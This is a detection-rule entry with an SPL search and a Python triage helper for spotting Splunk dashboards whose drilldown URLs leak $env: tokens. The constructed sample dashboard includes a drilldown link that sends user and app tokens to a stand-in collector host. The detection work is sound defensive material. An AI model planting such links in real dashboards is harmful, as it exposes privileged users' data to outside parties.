LoFP / This search may reveal non-malicious URLs with environment variables used in organizations.

Techniques

Sample rules

Splunk Account Discovery Drilldown Dashboard Disclosure

Description

A vulnerability in the drilldown function of the Splunk Dashboard application can potentially expose tokens from privileged users. An attacker can create a dashboard, share it with a privileged user (admin), and detokenize variables using external URLs within the dashboard's drilldown function.

Detection logic


| rest splunk_server=local /servicesNS/-/-/data/ui/views 
| search eai:data="*$env:*" eai:data="*url*" eai:data="*options*" 
| rename author AS Author eai:acl.sharing AS Permissions eai:appName AS App eai:data AS "Dashboard XML" 
| fields Author Permissions App "Dashboard XML" 
| `splunk_account_discovery_drilldown_dashboard_disclosure_filter`
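Triage helper for the "Dashboard XML" field returned by the search above, as an added example that is not part of the original rule: it lists only URLs that actually embed an $env:...$ token and separates hosts the organization expects from ones that need review. TRUSTED_HOSTS, the host names and the sample dashboard are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts your organization accepts as drilldown targets.
TRUSTED_HOSTS = {"wiki.corp.example", "splunk.corp.example"}

URL_RE = re.compile(r"https?://[^\s\"'<>\[\]]+", re.IGNORECASE)
ENV_TOKEN_RE = re.compile(r"\$env:([A-Za-z_]+)\$")

def triage(dashboard_xml, trusted_hosts=TRUSTED_HOSTS):
    """Return (url, env_tokens, verdict) for each URL embedding an $env:...$ token."""
    findings = []
    for match in URL_RE.finditer(dashboard_xml):
        url = match.group(0)
        tokens = ENV_TOKEN_RE.findall(url)
        if not tokens:
            continue  # plain link, nothing is detokenized into it
        try:
            host = (urlsplit(url).hostname or "").lower()
        except ValueError:
            host = ""  # unparsable URL: never treat as trusted
        trusted = host in trusted_hosts or any(
            host.endswith("." + h) for h in trusted_hosts)
        findings.append((url, tokens, "expected" if trusted else "review"))
    return findings

# Constructed sample of an eai:data value (not taken from a real dashboard).
SAMPLE = """
<dashboard>
  <row><panel><table>
    <drilldown>
      <link target="_blank">https://wiki.corp.example/runbook?app=$env:app$</link>
    </drilldown>
  </table></panel></row>
  <row><panel><table>
    <drilldown>
      <link target="_blank">https://collector.invalid/c?u=$env:user$&amp;a=$env:app$</link>
    </drilldown>
  </table></panel></row>
  <row><panel><html><a href="https://docs.corp.example/help">help</a></html></panel></row>
</dashboard>
"""

if __name__ == "__main__":
    for url, tokens, verdict in triage(SAMPLE):
        print(f"{verdict:8} {','.join(tokens):10} {url}")
```

Rows marked "expected" correspond to the false positive this entry describes; rows marked "review" are the ones to check against the dashboard's Author and Permissions fields.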